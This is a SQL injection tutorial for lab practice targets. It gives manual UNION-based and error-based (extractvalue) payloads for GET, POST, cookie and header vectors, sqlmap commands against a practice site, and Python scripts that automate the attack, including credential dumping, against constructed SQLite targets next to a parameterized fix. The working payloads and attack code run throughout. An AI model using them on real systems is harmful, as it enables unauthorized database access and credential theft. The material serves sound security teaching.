SQL injection: manual method & automated method of exploitation

SQL-Injection:
              Finding the injection point.
              Finding the query vulnerability: probe with { ' , " , \ , ') , ") } and watch for an SQL error or a change in the page output.
              Fixing & balancing the query.
              Exploiting the database.
              
Injection point:
                                     GET 
                                     POST 
                                     COOKIES 
                                     HEADER 
GET Method:
                 The attacker injects through a URL query-string parameter (e.g. ?id=1).
                 Step 1: Identify the injection point.
                 Step 2: Balance the query. (--+ used to balance the query: MySQL needs a space after --, and the + decodes to a space in a URL)
                 Step 3: Identify the number of columns in the query (ORDER BY n: raise n until the query errors; the count is n-1).
                 Step 4: Identify the column(s) displayed on the page (using union all select 1,2,3 after a non-matching id such as id=-1, so the union row is what gets shown).
                 Step 5: Exploitation of the database.

1. How to identify the database name, table names and column data in GET-based SQLi (manual method)?

Step 1: Identify the injection point.
Step 2: Balance the query. (--+ used to balance the query: MySQL needs a space after --, and the + decodes to a space in a URL)
Step 3: Identify the number of columns in the query (ORDER BY n: raise n until the query errors; the count is n-1).
Step 4: Identify the column(s) displayed on the page (using union all select 1,2,3 after a non-matching id such as id=-1).
Step 5: To identify the current database name:
                    put database() in the displayed column.
          1) To identify all the databases on the server.
                    schema_name is a column of information_schema.schemata; GROUP_CONCAT() joins every row into one value so the whole list fits in the single displayed column.
                    EX: select GROUP_CONCAT(schema_name SEPARATOR ',') from information_schema.schemata
                    output: leettime_761wHole
          2) To identify all tables in a database
                    table_name is a column of information_schema.tables; filter on table_schema to stay inside one database.
                    Syntax:
                        select GROUP_CONCAT(table_name SEPARATOR ',') from information_schema.tables where table_schema = "DATABASE_NAME"
                    EX: select GROUP_CONCAT(table_name SEPARATOR ',') from information_schema.tables where table_schema = "leettime_761wHole"
          3) To identify the columns of the tables in the database
                    Syntax:
                       select GROUP_CONCAT(column_name SEPARATOR ',') from information_schema.columns where table_schema = "DATABASE_NAME"
                    (add and table_name = "TABLE_NAME" to list one table's columns; without it you get every column of every table in the database in one string)
                    EX: select GROUP_CONCAT(column_name SEPARATOR ',') from information_schema.columns where table_schema = "leettime_761wHole"
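The five steps above carried out end to end, as an added example that is not part of the original post: a small vulnerable GET handler built on SQLite with constructed sample data (standing in for the leettime target), the same handler with a bound parameter next to it, and an attacker that finds the injection point, balances the query, counts columns with ORDER BY, finds the displayed column with UNION ALL SELECT, and then reads the table list and credentials through that column. SQLite has no information_schema, so the example reads sqlite_master where MySQL would read information_schema.tables, and the comment form -- - is used because nothing URL-decodes the payload here. The attacker functions work unchanged for POST, cookie and header vectors: only the page() function that delivers the parameter changes.

```python
import sqlite3


def build_db():
    """Constructed sample data standing in for the target's database (not real data)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'bob', 'hunter2');
        CREATE TABLE flags(id INTEGER, flag TEXT);
        INSERT INTO flags VALUES (1, 'FLAG{constructed}');
    """)
    return con


def vulnerable_page(con):
    """GET handler for ?id=...: the parameter is pasted into the SQL string (the bug)."""
    def page(id_param):
        sql = f"SELECT id, username, password FROM users WHERE id='{id_param}'"
        try:
            return {"error": None, "row": con.execute(sql).fetchone()}
        except sqlite3.Error as exc:          # the page leaks the DB error, like the lab target
            return {"error": str(exc), "row": None}
    return page


def hardened_page(con):
    """Same query with a bound parameter: input can never change the query structure."""
    def page(id_param):
        sql = "SELECT id, username, password FROM users WHERE id=?"
        return {"error": None, "row": con.execute(sql, (id_param,)).fetchone()}
    return page


# MySQL needs a space after '--'; in a URL that is '--+'.  No decoding happens here, so '-- -'.
COMMENT = " -- -"


def step1_injection_point(page):
    # A lone quote breaks the literal: an SQL error means the value reaches the query unescaped.
    return page("1'")["error"] is not None


def step2_balance(page):
    # Close the literal and comment out the rest; the query runs cleanly again.
    return page("1'" + COMMENT)["error"] is None


def step3_count_columns(page, max_cols=20):
    # ORDER BY n succeeds while n <= number of columns; the first failing n gives n - 1.
    for n in range(1, max_cols + 1):
        if page(f"1' ORDER BY {n}{COMMENT}")["error"] is not None:
            return n - 1
    raise RuntimeError("column count exceeds max_cols")


def step4_displayed_columns(page, ncols):
    # Empty the real result (id=-1) and UNION a row of markers; the markers that
    # show up on the page are the columns the attacker can read data through.
    markers = ",".join(f"'col{i}'" for i in range(1, ncols + 1))
    row = page(f"-1' UNION ALL SELECT {markers}{COMMENT}")["row"] or ()
    return [i for i in range(1, ncols + 1) if f"col{i}" in row]


def step5_extract(page, ncols, col, subquery):
    # Put a scalar subquery in the displayed column.  On MySQL this is where
    # GROUP_CONCAT(...) FROM information_schema.* goes; SQLite has sqlite_master instead.
    cells = ["NULL"] * ncols
    cells[col - 1] = f"({subquery})"
    row = page(f"-1' UNION ALL SELECT {','.join(cells)}{COMMENT}")["row"]
    return None if row is None else row[col - 1]


def run_attack(page):
    """The manual workflow end to end; returns what each step learned."""
    result = {"injectable": step1_injection_point(page)}
    if not result["injectable"]:
        return result
    result["balanced"] = step2_balance(page)
    ncols = step3_count_columns(page)
    displayed = step4_displayed_columns(page, ncols)
    result.update(ncols=ncols, displayed=displayed)
    col = displayed[0]
    result["tables"] = step5_extract(
        page, ncols, col, "SELECT group_concat(name, ',') FROM sqlite_master WHERE type='table'")
    result["users"] = step5_extract(
        page, ncols, col, "SELECT group_concat(username || ':' || password, ',') FROM users")
    return result


def demo():
    """Run the attack against the vulnerable handler and the hardened one."""
    con = build_db()
    return run_attack(vulnerable_page(con)), run_attack(hardened_page(con))


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print(vulnerable)   # every step succeeds and the users table is dumped
    print(hardened)     # {'injectable': False}: the bound parameter never breaks the literal
```

Against the hardened handler step 1 already fails, because the quote is bound as data and the query stays syntactically intact; that is the whole difference between string concatenation and a parameterized query.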

2. How to identify the database name, table names and column data in GET-based SQLi (automated method, sqlmap)?

CMD:

Extracting databases:
sqlmap -u "http://www.leettime.net/sqlninja.com/tasks/deathrow_ch3.php?id=1" --dbs

Extracting tables:
sqlmap -u "http://www.leettime.net/sqlninja.com/tasks/deathrow_ch3.php?id=1" -D "particular_DB_NAME" --tables

Extracting columns:
sqlmap -u "http://www.leettime.net/sqlninja.com/tasks/deathrow_ch3.php?id=1" -D "particular_DB_NAME" --columns
(add -T "particular_TABLE_NAME" to limit the listing to one table; quote the URL so the shell does not interpret ? and &)

Double Query situation (error-based):
                    "order by" works (so the column count can still be found), but the UNION SELECT output is never displayed on the page, so the data has to come back inside an SQL error message instead.
How to extract the data from the database in a double query situation?
                    Inject as: ?id=1' and extractvalue(0x0a,concat(0x0a,(SUBQUERY)))--+
                    The 0x0a (newline) that concat() puts in front makes the second argument invalid XPath, so MySQL raises an error that echoes the expression, subquery result included.
  1) To identify all the databases on the server.
                    Wrap the same information_schema.schemata query in extractvalue().
                    EX: extractvalue(0x0a,concat(0x0a,(select GROUP_CONCAT(schema_name SEPARATOR ',') from information_schema.schemata)))
                    output: leettime_761wHole
          2) To identify all tables in the database
                    Syntax:
                        extractvalue(0x0a,concat(0x0a,(select GROUP_CONCAT(table_name SEPARATOR ',') from information_schema.tables where table_schema = "DATABASE_NAME")))
                    EX: extractvalue(0x0a,concat(0x0a,(select GROUP_CONCAT(table_name SEPARATOR ',') from information_schema.tables where table_schema = "leettime_761wHole")))
          3) To identify all the columns of the tables in the database
                    Syntax:
                       extractvalue(0x0a,concat(0x0a,(select GROUP_CONCAT(column_name SEPARATOR ',') from information_schema.columns where table_schema = "DATABASE_NAME")))
                    EX: extractvalue(0x0a,concat(0x0a,(select GROUP_CONCAT(column_name SEPARATOR ',') from information_schema.columns where table_schema = "leettime_761wHole")))
                    Caveat: the error message shows only the first 32 characters of the expression (one of them is the 0x0a), so a long GROUP_CONCAT result has to be read in pieces with substring().


What is XPath & how is data retrieved with it?
 Using the extractvalue() function we can extract the data in a double query situation.


  • MySQL's extractvalue() function retrieves data from an XML fragment (a string, or a column that contains XML)
  • first argument is the XML fragment, e.g. the column doc
  • second argument is an XPath expression, written as a string in single quotes
  • e.g.
    select extractValue(doc,'/book/title') as Title from x;
  • if the second argument is not valid XPath, MySQL raises "XPATH syntax error" and echoes the bad expression (truncated to 32 characters) in the message; that echo is the data channel used in the double query method.
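The double query method of the two sections above, as an added example that is not from the original post and goes one step beyond it by handling the 32-character limit: a constructed stand-in for a MySQL target that shows SQL errors but never shows UNION output (it evaluates the attacker's subquery on SQLite and then fails the way MySQL does when extractvalue() gets an invalid XPath expression), and an attacker that reads the value through the error 31 characters at a time. substr() is used because both MySQL and SQLite accept it; the table names are constructed.

```python
import re
import sqlite3

ECHO_LIMIT = 32                    # MySQL echoes at most 32 characters of the invalid XPath expression
PREFIX = "\n"                      # 0x0a, concat()ed in front so the expression is never valid XPath
CHUNK = ECHO_LIMIT - len(PREFIX)   # data characters visible per error message: 31


def make_target():
    """Constructed stand-in for the double query situation: a page that never shows
    UNION output but does show SQL errors.  It evaluates the attacker's subquery on
    SQLite and then fails the way MySQL does when extractvalue() gets bad XPath."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE t(name TEXT)")          # constructed table names
    con.executemany("INSERT INTO t VALUES (?)",
                    [(n,) for n in ("users", "credentials", "flags", "audit_log", "sessions")])
    inner = re.compile(r"extractvalue\(0x0a,concat\(0x0a,\((.*)\)\)\)")

    def page(id_param):
        m = inner.search(id_param)
        if not m:
            return "ok"                                 # normal page, nothing echoed
        value = con.execute("SELECT " + m.group(1)).fetchone()[0]
        expr = PREFIX + ("" if value is None else str(value))
        return f"XPATH syntax error: '{expr[:ECHO_LIMIT]}'"
    return page


XPATH_ERR = re.compile(r"XPATH syntax error: '(.*)'", re.S)   # re.S: the echo starts with a newline


def error_leak(page, subquery):
    """Read a subquery's full value through the error message, CHUNK characters per
    request.  Returns (value, number_of_requests)."""
    out, offset, requests = "", 1, 0
    while True:
        piece_sql = f"substr(({subquery}),{offset},{CHUNK})"
        payload = f"1' and extractvalue(0x0a,concat(0x0a,({piece_sql}))) -- -"
        requests += 1
        m = XPATH_ERR.search(page(payload))
        if not m:
            raise RuntimeError("no SQL error echoed: not an error-based situation")
        piece = m.group(1)[len(PREFIX):]      # drop the 0x0a marker we added
        out += piece
        if len(piece) < CHUNK:                # a short (or empty) piece means the value is exhausted
            return out, requests
        offset += CHUNK


if __name__ == "__main__":
    target = make_target()
    value, n = error_leak(target, "select group_concat(name, ',') from t")
    print(f"{value!r} recovered in {n} requests")
```

Against a real MySQL target the same subquery would be select GROUP_CONCAT(table_name SEPARATOR ',') from information_schema.tables where table_schema = "DATABASE_NAME"; the offset arithmetic is what matters, because a single extractvalue() call silently drops everything after the 32nd character.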
POST Method:
                 The attacker injects through an HTML form field whose value ends up in an SQL query; the parameter travels in the request body, so it is edited with an intercepting proxy rather than in the URL.
                 Step 1: Identify the injection point.
                 Step 2: Balance the query. (-- followed by a space used to balance the query; --+ also works because a form body is URL-decoded like a query string)
                 Step 3: Identify the number of columns in the query (ORDER BY n: raise n until the query errors; the count is n-1).
                 Step 4: Identify the column(s) displayed on the page (using union all select 1,2,3).
                 Step 5: Exploitation of the database.



COOKIE Method:
                 The attacker has to find the cookie parameter that reaches a query.
                 Step 1: Identify the injection point using "\" (a backslash escapes the closing quote of the literal, so the query breaks with an SQL error if the cookie value reaches it unescaped).
                 Step 2: Balance the query. (-- followed by a space, or #, used to balance the query; cookie values are not URL-decoded, so --+ would not work here)
                 Step 3: Identify the number of columns in the query (ORDER BY n: raise n until the query errors; the count is n-1).
                 Step 4: Identify the column(s) displayed on the page (using union all select 1,2,3).

                 Step 5: Exploitation of the database.

HEADER Method:
                 The attacker has to find a request header that reaches a query, such as User-Agent | Referer | Host (typical for logging or analytics code that stores them).
                 Step 1: Identify the injection point.
                 Step 2: Balance the query. (-- followed by a space, or #, used to balance the query; --+ only works where the value is URL-decoded, which request headers normally are not)
                 Step 3: Identify the number of columns in the query (ORDER BY n: raise n until the query errors; the count is n-1).
                 Step 4: Identify the column(s) displayed on the page (using union all select 1,2,3).

                 Step 5: Exploitation of the database.
